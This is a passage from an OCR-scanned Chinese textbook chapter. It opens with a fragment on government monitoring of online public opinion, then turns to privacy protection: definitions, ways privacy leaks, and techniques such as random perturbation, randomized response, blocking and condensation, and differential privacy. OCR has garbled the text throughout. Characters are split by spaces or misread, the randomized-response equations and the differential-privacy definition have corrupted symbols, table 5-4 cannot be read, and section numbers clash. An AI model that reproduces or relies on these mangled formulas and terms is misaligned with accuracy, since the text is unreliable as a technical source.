息 的 透明 度 ， 提 高 政府 的 公信 力 。 

(4) 部 门 联动 ， 分 工 协作 

部 门 联动 、 职 责 明 确 、 分 工 合作 ， 共 同 营造 文明 健康 的 网 络 与 论 氛 围 。 

O 领导 要 关注 网 络 与 情 ; 

@ 部 门 联动 ， 分 工 协作 ; 

图 各 级 互联 网 管理 部 门 要 落实 专人 适时 监控 网 络 与 情 ， 给 领导 当 好 参谋 。 网 络 与 
情 的 监测 与 应 对 是 一 项 长 期 的 经 常 性 工作 ， 是 网 络 信息 安全 的 重要 内 容 ， 一 定 要 以 高 度 
的 政治 责任 感 和 敏锐 的 政治 洞察 力 认 真 做 好 这 项 工作 ， 要 防微杜渐 ， 防 患 于 未 然 ， 把 不 
安定 因素 消灭 在 萌芽 状态 。 


5.5 隐私 保护 


5.5.1 介绍 


1. 基本 概念 

隐私 作为 一 个 心理 和 社会 学 的 概念 ， 很 多 学 者 在 隐私 的 定义 、 如 何 保护 隐私 和 人 们 
对 隐私 的 感知 等 不 同 的 角度 对 其 进行 了 研究 。1890 年 Warren 和 Brandeis 在 《哈佛 法 律 
评论 》 上 发 表 了 《隐私 权 》(The Right to Privacy) 一 文 ， 首 次 提出 了 隐私 权 的 概念 。 他 
们 认为 隐私 是 一 种 权利 ， 即 定义 为 : 独处 的 权利 (Right to be Left Alone). Mason 认为 隐 
私 是 “控制 、 收 集 和 使 用 个 人 信息 的 权利 ” Culnan 将 隐私 定义 为 “ 某 人 控制 其 他 人 接 
触 自己 个 人 信息 的 能 力 ” 因此 对 于 隐私 ， 我 们 很 难 找到 能 适用 于 不 同 领域 研究 的 普遍 
定义 。 
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随 着 互联 网 所 带 来 的 信息 革命 ， 以 及 智能 终端 ”电子 商务 、 可 穿戴 设备 的 兴起 与 蓬 
勃发 展 ， 人 们 在 网 络 上 的 活动 越 来 越 多 ， 如 网 上 购物 、 网 络 通信 、 浏 览 查询 等 。 这 些 新 
技术 的 发 展 极 大 地 改变 了 人 们 的 生活 和 工作 方式 ， 同 时 个 人 的 信息 隐私 也 同样 遭 到 了 前 
所 未 有 的 威胁 ， 每 一 个 使 用 计算 机 和 互联 网 的 消费 者 都 面临 泄露 个 人 信息 的 风险 。 在 人 
们 习以为常 的 网 络 活动 中 ， 涉 及 到 大 量 的 个 人 隐私 信息 ， 如 个 人 身份 、 社 会 关系 、 银 行 
账户 、 喜 好 偏见 等 ， 而 这 些 个 人 信息 很 容易 利用 现 有 的 技术 手段 进行 收集 和 利用 。 据 
CNNIC2015 年 对 中 国 网 民 信 息 网 络 安 全 状况 研究 报告 表明 ， 中 国 网 民 规模 达 6.68 亿 ， 
互联 网 普及 率 为 48.8%。 在 如 此 庞大 的 网 民 队 伍 中 ， 大 部 分 用 户 对 互联 网 的 信任 度 与 安 
全 感 普遍 较 低 ， 表 示 担 心 提供 个 人 信息 的 安全 。 

整个 社会 已 经 进入 了 “大 数据 ”时 代 ， 不 管 人 们 是 否 愿意 ， 我 们 的 个 人 数据 正在 不 
经 意 间 被 动 地 被 企业 、 个 人 搜集 并 利用 。 个 人 数据 的 网 络 化 和 透明 化 已 经 成 为 了 不 可 阻 
挡 的 大 趋势 。 过 去 ， 能 够 大 量 掌 控 公民 个 人 数据 的 机 构 只 能 是 持 有 公 权 力 的 政府 机 构 ， 
但 现在 许多 企业 和 某 些 个 人 也 能 拥有 海量 数据 ， 甚 至 在 某 些 方面 超过 政府 机 构 。 这 些 用 
户 数据 对 企业 来 说 是 珍贵 的 资源 ， 因 为 他 们 可 以 通过 数据 挖 据 和 机 器 学 习 从 中 获得 大 量 
有 价值 的 信息 。 与 此 同时 ， 用 户 数据 亦 是 危险 的 “潘多拉 之 盒 ” 数据 一 旦 泄漏 ， 用 户 的 
隐私 将 被 侵犯 。 

面 对 如 此 严峻 的 隐私 泄露 问题 ， 很 多 国家 已 经 认识 到 保护 用 户 隐私 的 重要 性 ， 并 通 
过 各 种 方式 促成 对 用 户 隐私 的 保护 。 目 前 ， 解 决 的 途径 主要 包括 制定 法 律 法 规 和 研究 技 
术 方法 两 个 方面 。 在 法 律 法 规 方 面 ， 欧 美 早 在 20 世纪 70 年 代 就 有 专门 的 隐私 保护 法 ， 
我 国 大 陆 虽 然 没 有 专门 的 隐私 保护 法 ， 但 在 多 个 法 律 法 规 的 条 文中 涉及 到 了 隐私 保护 ， 
对 保护 个 人 隐私 作 了 间接 的 、 原 则 性 的 规定 。 我 国 各 部 门 也 制定 了 一 些 强制 管理 措施 来 
保护 隐私 数据 ， 取 得 了 一 定 的 保护 效果 。 例 如 ， 根 据 《 执 业 医师 法 》 和 《医疗 事故 处 理 
条 例 》 等 法 律 法 规 的 规定 ， 医 生 和 医院 必须 在 医疗 过 程 中 保护 患者 的 个 人 隐私 ， 尊 重 患 
者 人 权 。 在 技术 方面 ， 国 内 外 众多 研究 学 者 对 隐私 保护 技术 和 方法 进行 了 深入 研究 ， 主 
要 从 数据 失真 、 数 据 加密 和 数据 匿名 化 三 个 角度 设计 隐私 方案 ， 已 经 提出 了 很 多 有 效 并 
且 可 行 的 保护 方法 。 

下 面 将 重点 讨论 在 技术 层面 上 如 何 保护 用 户 隐私 。 首 先 介绍 隐私 保护 的 一 些 基本 概 
念 ， 包 括 隐 私 保护 目标 、 隐 私 泄露 方式 等 ， 然 后 重点 讨论 了 目前 存在 的 三 种 隐私 保护 技 
A: 数据 失真 、 数 据 加 密 和 数据 匿名 化 。 最 后 给 出 隐私 度量 和 评估 方法 来 对 比 这 儿 种 隐 
私 保护 技术 的 优 缺 点 和 适用 领域 。 

2. 隐私 保护 目标 

为 了 保护 用 户 的 隐私 ， 需 要 首先 了 解 用 户 所 关注 的 隐私 数据 ， 划 分 隐私 数据 类 型 ， 
才能 更 好 地 采取 相应 的 隐私 保护 策略 。 在 信息 安全 领域 ， 隐 私 主要 是 指 个 人 、 机 构 等 实 
体 在 使 用 计算 机 和 互联 网 的 过 程 中 不 愿意 被 外 部 知晓 的 信息 。 比 如 ， 个 人 的 行为 模式 、 
兴趣 爱好 、 健 康 状况 、 公 司 的 财务 状况 等 。 由 于 人 们 对 隐私 的 限定 标准 不 同 ， 对 隐私 的 
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定义 也 有 所 差异 。 例 如 ， 保 守 的 病人 会 将 疾病 信息 作为 隐私 ， 而 开放 一 点 的 病人 却 不 将 
其 视 为 隐私 。 一 般 来 说 ， 从 隐私 所 有 者 的 角度 ， 隐 私 可 以 分 为 以 下 三 类 : 

(1) 个 人 隐私 

个 人 隐私 信息 分 为 一 般 属性 、 标识 属性 和 敏感 属性 ,一般 属性 可 直接 用 来 识别 个 体 ， 
是 隐私 保护 过 程 中 需要 保护 的 首要 信息 ， 例 如 个 人 的 姓名 、 指 纹 、 肖 像 、 身 份 证 件 等 ; 
标识 属性 指 含有 高 度 的 个 人 特征 而 能 用 来 间接 识别 个 体 的 属性 , 例如 个 人 的 年 龄 、 性 别 、 
学 历 等 信息 ; 敏感 属性 指 不 愿意 为 他 人 所 知 的 一 些 个 人 信息 , 例如 财物 收入 、 病史 情 况 、 
犯罪 记录 等 信息 。 这 些 属性 在 隐私 权 保护 范围 内 , 应 当 从 法 律 的 高 度 以 隐私 权 加 以 保护 。 

(2) 通信 内 容 隐 私 

社会 关系 是 通过 人 们 间 的 相互 交流 沟通 构建 而 成 ， 然 而 通信 当事人 往往 不 想 通 信 内 
容 为 第 三 方 所 知 。 过 去 的 通信 手段 无 外 乎 面谈 和 书信 ， 通 信 内 容 的 安全 性 很 高 。 但 是 ， 
随 着 技术 的 发 展 ， 很 多 第 三 方 作为 通信 服务 提供 商 介入 了 通信 ， 提 供 服务 的 同时 也 造成 
了 安全 隐患 ， 例 如 腾讯 、 中 国 移动 等 公司 提供 的 服务 。 现 在 通信 内 容 一 般 都 被 数字 化 存 
储 ， 可 以 利用 一 定 的 手段 进行 再 现 ， 通 信 内 容 很 容易 暴露 ， 所 以 通信 内 容 应 加 以 保护 。 

(3) 行为 隐私 

人 们 面临 的 威胁 并 不 仅 限于 个 人 隐私 泄露 ， 还 在 于 基于 数据 挖掘 技术 对 人 们 状态 和 
行为 的 预测 ， 例 如 喜好 偏见 、 浏 览 记录 、 购 物 习 惯 和 生活 轨迹 等 日 常 行为 。 一 个 典型 的 
例子 是 某 零 售 商 通过 历史 记录 分 析 ， 比 家 长 更 早 知 道 其 女儿 已 经 怀孕 的 事实 ， 并 向 其 邮 
寄 相 关 广 告 信息 。 而 社交 网 络 分 析 研 究 也 表明 ， 可 以 通过 其 中 的 群 组 特性 发 现 用 户 的 属 
性 。 例 如 通过 分 析 用 户 的 Twitter 信息 ， 可 以 发 现 用 户 的 政治 倾向 、 消 费 习惯 以 及 喜好 的 
球 队 等 。 

3. 隐私 泄露 方式 

近年 来 ， 已 经 发 生 了 多 起 用 户 隐 私 泄露 事件 ， 公 民 的 个 人 隐私 数据 保护 遭 到 了 严峻 
挑战 。 例 如 2011 年 CSDN 用 户 名 泄露 事件 ，2013 年 搜狗 输入 法 上 传 用 户 隐 私 数据 (图 
片 、 视 频 等 ) 到 云端 服务 器 事件 ，2014 年 索尼 影 业 员 工 信 息 泄露 事件 等 等 。 接 二 连 三 的 
隐私 泄露 事件 让 用 户 觉得 毫 无 “安全 感 ” 各 种 网 络 泄露 、 黑 客 入 侵 事 件 让 用 户 和 企业 防 
不 胜 防 。 下 面 对 当 前 用 户 隐私 泄露 的 几 种 主要 方式 进行 简单 介绍 。 
(1) 互联 网 服务 
用 户 为 了 获得 各 种 Web 服务 ， 如 申请 邮箱 、 注 册 抽 奖 或 是 网 上 购物 等 ， 常 常 需要 在 
应 网 站 上 登记 许多 个 人 信息 ， 如 年 龄 、 性 别 、 出 生年 月 、 收 入 、 职 业 、 个 人 爱好 等 。 
着 大 数据 时 代 的 推进 ， 互 联网 服务 成 为 最 大 的 隐私 泄露 风险 来 源 ， 大 量 网 站 通过 一 些 
法 或 者 隐蔽 的 技术 手段 收集 到 网 络 用 户 的 个 人 信息 。 其 中 首当其冲 的 就 是 云 服务 及 社 
交 应 用 。 

云 服务 是 近年 来 推出 的 一 种 新 兴 存 储 服 务 ， 方 便 用 户 将 资料 存储 于 互联 网 服务 器 
中 ,但 最 近 所 发 生 的 云 服务 漏洞 问题 也 不 在 少数 。 一 旦 出 现 泄露 ， 黑 客 就 可 以 轻松 查看 
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用 户 各 种 数据 ， 后 果 不 堪 设 想 。 

目前 对 网 站 服务 缺少 强 有 力 的 外 部 监督 ， 网 站 很 可 能 会 不 正当 地 使 用 注册 用 户 信 
息 ， 与 其 他 实体 进行 信息 共享 ， 更 有 甚 者 会 出 租 或 转 售 用 户 信息 ， 从 而 汇 露 用 户 的 个 人 
隐私 。 例 如 医疗 信息 网 站 DrKoop.com 在 没有 征 得 用 户 许可 的 情况 下 将 用 户 的 医疗 信息 
出 售 给 网 站 vitacostcom， 结 果 因 其 侵害 了 他 人 的 隐私 权 而 导致 破产 。 

(2) 智能 终端 

如 今 ， 智 能 手机 几乎 是 人 手 必 备 的 电子 产品 ， 其 他 智能 终端 ， 例 如 平板 电脑 、 智 能 
手 环 、 智 能 家 居 等 ， 也 越 来 越 普及 。 我 们 在 使 用 这 些 智 能 设备 的 过 程 中 ， 它 们 在 时 刻 记 
录 着 我 们 的 聊天 、 购 物 、 网 页 访问 、 下 载 文 件 等 行为 。 相 比 其 他 数字 设备 ， 人 们 更 加 偏 
爱 将 这 些 隐私 数据 藏 在 智能 终端 中 ， 以 享受 随时 随地 跨 平台 同步 照片 、 视 频 、 文 档 、 应 
用 等 便利 服务 。 智 能 移动 终端 实时 在 线 、 随 身 携带 、 情 景 感知 的 特点 ， 使 得 其 包含 有 大 
量 用户 敏 感 信息 ， 例 如 短信 记录 、 通 话 记录 、 电 子 邮 件 、 银 行 账户 和 位 置 轨迹 等 。 这 些 
重要 数据 对 黑客 们 来 说 都 是 宝藏 ， 越 来 越 多 的 不 法 分 子 也 将 目光 集中 在 了 智能 终端 上 ， 
恶意 终端 成 为 隐私 泄露 的 重要 渠道 。 

移动 通信 技术 和 定位 技术 的 发 展 ， 以 及 移动 互联 网 应 用 的 广泛 使 用 ， 给 隐私 保护 带 
来 了 新 的 难题 。 例如 , 通过 电 信 、 移动 运营 商 的 网 络 能 够 获取 移动 终端 用 户 的 位 置信 息 ， 
引发 个 人 隐私 权 的 问题 .3G 或 4G 等 移动 通信 技术 的 飞速 发 展 提高 了 信息 传递 的 便利 性 ， 
这 种 便利 也 增加 了 个 人 隐私 保护 的 难度 。 另 外 ， 为 了 简化 应 用 程序 的 开发 步骤 ， 很 多 智 
终端 厂商 都 选择 开放 API 接口 。 这 样 通过 API 接口 ， 攻 击 者 就 能 够 很 容易 的 监控 终端 
状态 ， 甚 至 操作 终端 文件 ， 直 接 涉 及 到 用 户 的 个 人 隐私 ， 给 隐私 保护 带 来 新 的 难度 。 

(3) 黑客 攻击 

由 于 Intemet 的 弱 安 全 性 ， 很 容易 导致 黑客 利用 这 一 弱点 入 侵 他 人 的 计算 机 而 窃取 
内 部 信息 。 很 多 黑客 通过 制造 、 传 播 计算 机 病毒 ， 破 坏 计算 机 系统 之 后 能 够 未 经 授权 就 
进入 系统 收集 资料 。 通 过 截取 或 复制 用 户 正在 传递 的 电子 信息 ， 他 们 能 够 窃取 和 算 改 用 
户 的 隐私 数据 ,从 而 引发 个 人 数据 隐私 权 保护 的 法 律 问题 。2014 年 苹果 iCloud 服务 泄露 
明星 隐私 事件 给 网 络 安全 再 次 敲 响 了 警钟 ,一贯 以 安全 著称 的 苹果 智能 设备 都 难以 幸免 ， 
其 他 智能 终端 的 用 户 更 是 发 发 可 危 。 黑客 利用 苹果 手机 iCloud 存储 空间 漏洞 ， 进 入 一 些 
用 户 的 苹果 手机 并 大 肆 盗 窃 找 贝 其 中 存储 的 各 类 数据 ， 包 括 照片 、 邮 件 等 ， 给 用 户 造成 
不 可 挽回 的 损失 。 

利用 TP 地 址 追踪 用 户 的 位 置 或 行踪 也 是 黑客 常用 的 手段 。 基 于 HTTP 的 Web 浏览 
是 互联 网 上 最 广泛 的 应 用 ， 它 运行 在 一 个 可 靠 的 传输 协议 如 TCP 上面。 在 Web 服务 器 
和 客户 机 建立 会 话 时 ，IP 地 址 、URL 和 软件 版 本 等 信息 都 将 传送 到 服务 器 。 因 此 ， 攻 击 
者 就 可 以 利用 IP 地 址 追踪 用 户 的 位 置 和 在 线 行为 等 。 特 别 是 ， 随 着 IPv6 的 使 用 ，HTTP 
的 消息 头 中 将 包含 更 直接 的 位 置信 息 。 
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另外 ， 黑 客 的 攻击 方式 还 有 很 多 ， 例 如 利用 Cookie 文件 收集 用 户 隐私 信息 ， 利 用 特 
洛 伊 木马 病毒 窍 取 隐 私信 息 、 利 用 嵌入 式 软件 收集 隐私 信息 、 利 用 篡改 网 页 收集 隐私 信 
息 等 。 这 些 攻击 方式 大 都 非常 隐蔽 ， 让 用 户 防不胜防 ， 需 要 引起 高 度 重 视 。 

(4) 管理 者 监听 

某 些 网 络 的 所 有 者 或 管理 者 甚至 是 政府 机 构 出 于 某 方面 的 考虑 ， 都 可 能 通过 网 络 中 
心 监视 或 窃听 用 户 的 个 人 计算 机 和 智能 终端 ， 而 这 些 操 作用 户 都 完全 不 知情 。 某 种 意义 
上 说 ， 全 球 大 部 分 人 的 个 人 信息 都 在 被 各 种 各 样 的 机 构 所 监控 ， 这 其 中 就 有 各 式 各 样 的 
商业 机 构 和 公 权 机 关 。 

斯 诺 登 爆料 的 美国 “棱镜 ”秘密 情报 监视 项 目 ， 就 是 美国 政府 对 民众 生活 进行 监控 
的 有 力 证 据 。 据 报道 ， 美 国政 府 采 用 一 定 的 监控 技术 ， 对 网 络 运营 商 的 核心 网 络 设备 进 
行 操控 ， 对 经 过 核心 网 络 设备 的 所 有 网 络 数据 镜像 存储 后 分 析 。 普 通用 户 上 网 过 程 中 所 
有 数据 都 会 通过 互联 网 运营 商 的 路 由 器 ， 在 政府 强制 力 下 ， 用 户 的 任何 隐私 数据 都 毫 无 
保密 性 可 言 。 

上 述 几 种 方式 并 不 能 完全 概括 所 有 的 隐私 泄露 途径 ， 还 有 一 些 更 加 隐蔽 的 隐私 窃取 
方式 ， 例 如 社会 工程 学 、 高 级 持续 性 威胁 (Advanced Persistent Threat，APT) 等 。 这 些 
攻击 手段 更 加 高 明 ， 也 更 加 难以 被 用 户 察觉 。 总 之 , 隐私 保护 在 当前 时 代 是 不 可 回避 的 ， 
需要 拿 出 切实 可 行 的 法 律 、 技 术 、 管 理 措施 ， 并 严格 遵照 执行 。 同 时 ， 广 大 民众 也 应 该 
养 成 保护 个 人 隐私 信息 的 意识 和 习惯 ,用 技术 和 法 律 的 手段 捍卫 自己 的 合法 权益 。 


5.5.2 ”隐私 保护 技术 


隐私 保护 问题 是 伴随 着 数据 应 用 而 提出 的 ， 在 统计 领域 ， 隐 私 保护 问题 最 先 受 到 关 
。 当 前 ， 隐 私 保护 的 主要 研究 方向 如 表 5-3 所 示 。 


表 5-3 隐私 保护 的 主要 研究 方向 


LE 


研究 方向 m 例 
通用 的 隐私 保护 技术 Perturbation、Randomization、Swapping、Encryption 
面向 数据 挖掘 的 隐私 保护 技术 Association Rule Mining、Classification、Clustering 
基于 隐私 保护 的 数据 发 布 原则 k-anonymity, I-diversity, m-Invariance, t-Closeness 
隐私 保护 算法 Anonymized Publication, Anonymization with High Utility 


国内 外 研究 人 员 对 隐私 保护 技术 进行 了 大 量 研究 ， 然 而 并 没有 任何 一 种 隐私 保护 技 
术 能 够 适用 于 所 有 的 应 用 场景 。 一 般 的 隐私 保护 技术 习惯 在 较 低 的 应 用 层次 上 保护 用 户 
的 隐私 ， 普 遍 通 过 引入 统计 和 概率 模型 来 实现 。 面 向 数据 挖 据 的 隐私 保护 技术 主要 解决 
高 层 应 用 中 的 隐私 保护 问题 ， 致 力 于 研究 如 何 根据 不 同 数据 挖掘 操作 的 特性 来 实现 对 隐 
私 的 保护 。 还 有 一 种 基于 隐私 保护 的 数据 发 布 方法 ， 它 的 基本 原则 是 提供 一 种 在 各 类 应 
用 中 都 能 够 适用 的 隐私 保护 方法 ， 从 而 达到 在 此 基础 上 设计 的 隐私 保护 算法 具有 通用 性 
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的 效果 。 从 数据 挖掘 的 角度 ， 目 前 的 隐私 保护 技术 主要 可 以 分 为 三 类 : 

(1) 基于 数据 失真 的 隐私 保护 技术 : 它 是 使 敏感 数据 失真 但 同时 保持 某 些 关 键 数 据 
或 者 属性 不 变 的 隐私 保护 技术 , 例如 ， 采 用 交换 (Swapping)、 添 加 噪声 等 技术 对 原始 数 
据 集 进行 处 理 ， 并 且 保 证 经 过 扰动 处 理 后 的 数据 仍然 保持 统计 方面 的 性 质 ， 以 便 进行 数 
据 挖 掘 等 操作 。 

(2) 基于 数据 加 密 的 隐私 保护 技术 : 它 是 采用 各 种 加 密 技术 在 分 布 式 环境 下 隐藏 敏 
感 数据 的 方法 , 如 安全 多 方 计算 (Secure Multiparty Computation, SMC). 分布 式 匿 名 化 、 
分 布 式 关联 规则 挖 据 和 分 布 式 聚 类 等 。 

G) 基于 数据 匿名 化 的 隐私 保护 技术 : 它 是 根据 具体 情况 有 条 件 地 发 布 数据 , 例如 ， 
不 发 布 原始 数据 的 某 些 值 、 数 据 泛 化 (Generalization) 等 。 

另外 ， 也 有 一 些 新 的 方法 融合 了 多 种 技术 以 实现 更 好 的 隐私 保护 ， 很 难 将 其 简单 地 
归 为 以 上 某 一 类 ， 但 它们 在 汲取 了 某 些 技术 优势 的 同时 ， 也 将 不 可 避免 地 引入 该 技术 的 
缺陷 。 例 如 ， 基 于 数据 失真 的 技术 ， 计 算 效 率 比较 高 ， 但 却 存在 信息 丢失 的 问题 ， 基 于 
数据 加 密 的 技术 能 够 保证 最 终 数据 的 准确 性 和 安全 性 ， 但 带 来 的 计算 开销 往往 较 大 ， 而 
基于 数据 匿名 化 的 技术 可 以 保证 所 发 布 数据 的 真实 性 ， 但 是 缺点 是 发 布 的 数据 会 存在 信 

在 接 下 来 的 几 节 中 ， 将 会 对 这 三 类 隐私 保护 技术 进行 深入 阐述 。 
5.6.2.1 基于 数据 失真 的 隐私 保护 技术 

数据 失真 技术 通过 扰动 (Perturbation) 原始 数据 来 实现 隐私 保护 。 它 要 使 扰动 后 的 
数据 同时 满足 : 

d) 攻击 者 不 能 发 现 真 实 的 原始 数据 。 也 就 是 说 ， 攻 击 者 通过 发 布 的 失真 数据 不 能 
重 构 出 真实 的 原始 数据 。 

(2) 失真 后 的 数据 仍然 保持 某 些 性 质 不 变 ， 即 利用 失真 数据 得 出 的 某 些 信息 等 同 于 
从 原始 数据 上 得 出 的 信息 。 这 就 保证 了 基于 失真 数据 的 某 些 应 用 的 可 行 性 。 

基于 数据 失真 的 技术 通过 添加 噪音 等 方法 ， 使 敏感 数据 失真 但 同时 保持 某 些 数据 或 
数据 属性 不 变 ， 仍 然 可 以 保持 某 些 统计 方面 的 性 质 。 第 一 种 是 随机 化 ， 即 对 原始 数据 加 
入 随机 噪声 ， 然 后 发 布 扰动 后 数据 的 方法 ， 第 二 种 是 阻塞 与 凝聚 ， 阻 塞 是 指 不 发 布 某 些 
特定 数据 的 方法 ， 凝 聚 是 指 原始 数据 记录 分 组 存储 统计 信息 的 方法 ， 第 三 类 是 差分 隐私 
保护 。 一 般 地 ， 当 进行 分 类 器 构建 和 关联 规则 挖掘 ， 而 数据 所 有 者 又 不 希望 发 布 真实 数 
据 时 ， 可 以 预先 对 原始 数据 进行 扰动 后 再 发 布 。 

1. 随机 化 

数据 随机 化 即 是 对 原始 数据 加 入 随机 噪声 ， 然 后 发 布 扰动 后 数据 的 方法 。 需 要 注意 
的 是 ， 随 意 对 数据 进行 随机 化 并 不 能 保证 数据 和 隐私 的 安全 ， 因 为 利用 概率 模型 进行 分 
析 常 常 能 披露 随机 化 过 程 的 众多 性 质 。 随 机 化 技术 包括 两 类 : 随机 扰动 (Random 
Perturbation) 和 随机 化 应 答 (Randomized Response). 
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(1) 随机 扰动 
随机 扰动 采用 随机 化 过 程 来 修改 敏感 数据 ， 从 而 实现 对 数据 隐私 的 保护 。 一 个 简单 
的 随机 扰动 模型 如 表 5-4 (a) 所 示 。 


R54 随机 扰动 与 重 构 过 程 
(a)》 随 机 扰动 过 程 
1 原始 数据 为 ’,X，…,%, ， 服 从 于 未 知 分 布下 


输入 


2. 扰动 数据 为 芒 , 力 ,…, 切 ， 服 从 于 特定 分 布 了 
输出 随机 扰动 后 的 数据 : x, + yX + Vas- Xn + Yn 
(b) 重 构 过 程 
输入 1， 随 机 扰动 后 的 数据 六 + VX + Vas- Xy H Yn 

2. 扰动 数据 的 分 布 工 
输出 原始 数据 分 布 凶 


对 外 界 而 言 ， 只 可 见 扰动 后 的 数据 ， 从 而 实现 了 对 真实 数据 值 的 隐藏 。 但 扰动 后 数 
据 仍 然 保 留 着 原始 数据 分 布 蕊 的 信息 , 通过 对 扰动 后 的 数据 进行 重 构 ( 表 5-4(b) 所 示 )， 
可 以 恢复 原始 数据 分 布 的 信息 。 但 不 能 重 构 原始 数据 的 精确 值 ,x,,…,x, 。 

随机 扰动 技术 可 以 在 不 暴露 原始 数据 的 情况 下 进行 多 种 数据 挖掘 操作 。 由 于 通过 扰 
动 数据 重 构 后 的 数据 分 布 几乎 等 同 于 原始 数据 的 分 布 ， 因 此 利用 重 构 数据 的 分 布 进行 决 
策 树 分 类 器 训练 后 ， 得 到 的 决策 树 能 很 好 地 对 数据 进行 分 类 。 在 关联 规则 挖掘 中 ， 通 过 
往 原始 数据 注入 大 量 伪 项 〈false item) 来 对 频繁 项 集 进 行 隐 藏 ， 再 通过 在 随机 扰动 后 的 
数据 上 估计 项 集 支 持 度 ， 从 而 发 现 关 联 规则 。 

(2) 随机 化 应 答 

随机 化 应 答 的 基本 思想 是 : 数据 所 有 者 对 原始 数据 扰动 后 发 布 ， 使 攻击 者 不 能 以 高 
于 预定 阔 值 的 概率 得 出 原始 数据 是 否 包含 某 些 真实 信息 或 伪 信 息 。 虽 然 发 布 的 数据 不 再 
真实 ， 但 在 数据 量 比较 大 的 情况 下 ， 统 计 信 息 和 汇聚 Aggregate) 信息 仍然 可 以 较为 精 
确 地 被 估算 出 。 随 机 化 应 答 技术 与 随机 扰动 技术 的 不 同 之 处 在 于 敏感 数据 是 通过 一 种 应 
答 特定 问题 的 方式 间接 提供 给 外 界 的 。 

随机 化 应 答 模型 有 两 种 : 相关 问题 模型 (Related-question Model) 和 非 相关 问题 
模型 CUnrelated-question Model)。 相 关 问 题 模型 是 通过 设计 两 个 关于 敏感 数据 的 对 立 问 
题 ， 如 : 

© 我 含有 敏感 值 A; 

@ 我 没有 敏感 值 A。 

数据 所 有 者 根据 自己 拥有 的 数据 随机 选取 一 个 问题 进行 应 答 ， 但 不 让 提问 者 知道 回 
答 的 具体 问题 。 当 大 量 数据 所 有 者 进行 回答 后 ， 通 过 计算 可 以 得 出 含有 敏感 值 的 应 答 者 
比例 和 不 含 敏感 值 应答 者 的 比例 。 假 设 应 答 者 随机 选取 问题 1 的 概率 为 2 ， 则 有 以 下 等 
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式 成 立 : 
P*(A=yes) = P(A=yes)° 0 + P(A = no)o (1-0) 
P*(A=no)= P(A=no)06+ P(A = yes)o (1-0) 

Hp P*(4= yes) 是 回答 中 yes 的 比例 , PCA = yes) 是 含有 敏感 值 A 的 数据 所 有 者 的 
比例 。 通 过 以 上 两 个 等 式 ， 联 合 对 所 有 应 答 进行 估计 得 出 的 P*(4= yes) Ail P*(4=n0), 
可 以 得 到 含有 (或 不 含有 ) 敏感 值 4 的 数据 所 有 者 比例 P(4 = yes) (ak P(A=no) )。 

在 这 整个 过 程 中 ， 由 于 不 能 确定 与 应 答 者 回答 的 相关 问题 ， 因 此 不 能 确定 其 是 否 含 
有 敏感 数据 值 。 由 于 基于 随机 化 应 答 技术 采用 应 答 模式 提供 信息 ， 因 此 多 用 于 处 理 分 类 
数据 (Categorical Data). 

2. 阻塞 与 凝聚 

随机 化 技术 一 个 无 法 避免 的 缺点 是 : 针对 不 同 的 应 用 都 需要 设计 特定 的 算法 对 转换 
后 的 数据 进行 处 理 ， 因 为 所 有 的 应 用 都 需要 重建 数据 的 分 布 。 鉴 于 随机 化 技术 存在 的 这 
个 缺陷 ， 研 究 人 员 提 出 了 凝聚 技术 : 它 将 原始 数据 记录 分 成 组 ， 每 一 组 内 存储 着 由 大 条 
记录 产生 的 统计 信息 ， 包 括 每 个 属性 的 均值 、 协 方差 等 。 这 样 ， 只 要 是 采用 凝聚 技术 处 
理 的 数据 ， 都 可 以 用 通用 的 重 构 算 法 进行 处 理 ， 并 且 重 构 后 的 记录 并 不 会 披露 原始 记录 
的 隐私 ， 因 为 同一 组 内 的 磊 条 记录 是 两 两 不 可 区 分 的 。 

与 随机 化 技术 修改 数据 、 提 供 非 真 实数 据 的 方法 不 同 ， 阻 塞 技术 采用 的 是 不 发 布 某 
些 特定 数据 的 方法 ， 因 为 某 些 应 用 更 希望 基于 真实 数据 进行 研究 。 阻 塞 技术 具体 反应 到 
数据 表 中 ， 即 是 将 某 些 特定 的 值 用 一 个 不 确定 符号 代替 。 例 如 通过 引入 除 0, 外 的 代表 
不 确定 值 的 符号 “?” 可 以 实现 对 布尔 关联 规则 的 隐藏 。 由 于 某 些 值 被 “?” 人 代替， 那么 
对 某 些 项 集 的 计数 则 为 一 个 不 确定 的 值 ， 位 于 一 个 最 小 估计 值 和 最 大 估计 值 范围 内 。 于 
是 ， 对 于 敏感 关联 规则 的 隐藏 即 是 设计 一 种 算法 ， 在 阻塞 尽量 少 的 数据 值 情况 下 将 敏感 
关联 规则 可 能 的 支持 度 和 置信 度 控制 在 预定 的 阔 值 以 下 。 类 似 于 对 关联 规则 的 隐藏 ， 利 
用 阻塞 技术 还 可 以 实现 对 分 类 规则 的 隐藏 。 

3. 差分 隐私 保护 

差分 隐私 保护 可 以 保证 ， 在 数据 集中 添加 或 删除 一 条 数据 不 会 影响 到 查询 输出 结 
果 ， 因 此 即使 在 最 坏 情 况 下 ， 攻 击 者 已 知 除 一 条 记录 之 外 的 所 有 敏感 数据 ， 仍 可 以 保证 
这 一 条 记录 的 敏感 信息 不 会 被 泄露 。 

定义 5-1 对 于 所 有 差别 至 多 为 一 个 记录 的 两 个 数据 集 D FD, , Range(K) 表示 一 
个 随机 函数 久 的 取 值 范围 ，Pr[E,] 表 示 事 件 E, 的 披露 风险 ， 若 随机 函数 天 提供 E- 差 分 
隐私 保护 ， 则 对 于 所 有 SC Range(K)， 有 

Pr[K(D,) € S] < exp(€) * Pr[K(D,) € S] 
计算 出 的 披露 风险 取决 于 随机 化 函数 天 的 值 。 
图 5-21 描绘 了 差别 至 多 为 一 个 记录 的 两 个 数据 集 D 和 DD, 满足 6- 差 分 隐私 的 披露 
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风险 曲线 。 


图 5-21 数据 集 Dy. Dy kh E -差分 隐私 披露 风险 曲线 


随机 函数 天 的 选择 与 攻击 者 所 具有 的 知识 无 关 ,， 只 要 天 满足 定义 5-1 就 可 以 保护 数 
据 集中 任意 数据 的 隐私 ， 即 使 攻击 者 已 经 掌握 其 他 的 所 有 数据 。 

在 满足 -差分 隐私 保护 时 ，2 越 小 ， 加 入 的 噪声 越 多 ， 隐 私 保护 的 级 别 越 高 。 因 此 
可 以 通过 设置 不 同 的 6 值 来 实现 隐私 保护 等 级 的 划分 。 

每 一 种 隐私 保护 方法 都 会 基于 一 种 攻击 模型 (Attacking Model), w 大 匿名 和 
l-diversity 所 基于 的 攻击 模型 假设 攻击 者 对 敏感 属性 的 信息 一 无 所 知 , 否则 隐私 便 无 法 得 
到 保护 。 差 分 隐私 所 定义 的 攻击 模型 是 : 最 坏 情况 下 ， 攻 击 者 已 知 除 一 条 记录 之 外 的 所 
